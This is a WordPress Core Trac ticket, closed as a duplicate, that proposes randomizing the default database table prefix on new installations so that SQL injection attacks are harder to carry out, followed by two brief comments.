WordPress.org

Make WordPress Core

Opened 4 years ago

Closed 4 years ago

Last modified 4 years ago

#17966 closed enhancement (duplicate)

Automatic table name randomization for improved security

Reported by: hexley Owned by:
Milestone: Priority: normal
Severity: normal Version: 3.2
Component: General Keywords:
Focuses: Cc:

Description

With the recent security exploits leaving users logins and passwords leaked into the open, I was thinking that perhaps there may be a way to make SQL injection attacks more challenging on the hackers.

The table names within WP are widely known. Certainly, they can be changed, but that is something I rarely see done, and takes user intervention. The current default table naming convention is wp-table_name.

On a new installation, perhaps it could be created so that table names take the form of:
wp-rand(0,2)-table_name

The random bits would be known, and could be easily included in the config file, or the config file data that a user copies and pastes.

This would add one additional layer of information that a would be hacker needs to know in order to act against the database with an SQL injection style attack. It definitely does not cover all aspects, as there is still chance for update, delete, and insert to be issued against known page-id's, however, injecting a drop, rename, download, or other larger operation would now essentially be password protected.

While the rand() part may not be terribly long, it should be enough of a deterrent that the hacker gives up and moves along to an easier target. I understand this is merely security by obscurity, for the rather simple implementation versus the payoff in challenge it imposes on the hacker, I feel it is worth it. I don't see a downside, and while we would all like to not have to deal with workarounds such as this, with open source code and rapid releases leaving users running old/legacy code, this could add that one small layer that protects those users a bit more than nothing.

Thanks for your consideration.

Change History (2)

comment:1 @ocean904 years ago

  • Milestone Awaiting Review deleted
  • Resolution set to duplicate
  • Status changed from new to closed

comment:2 @hebbet4 years ago

maybe wordpress should show a notice like that:
For better security you should change wp_ to (random four letters here)_

Note: See TracTickets for help on using tickets.